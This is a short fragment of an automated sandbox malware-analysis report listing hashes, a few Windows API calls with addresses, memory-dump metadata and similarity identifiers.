                        • Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
                        APIs
                        • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                        • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                        • SetLastError.KERNEL32(0000007F), ref: 00411C7A
                        • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLastRead
                        • String ID:
                        • API String ID: 4100373531-0
                        • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                        • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                        • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                        • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99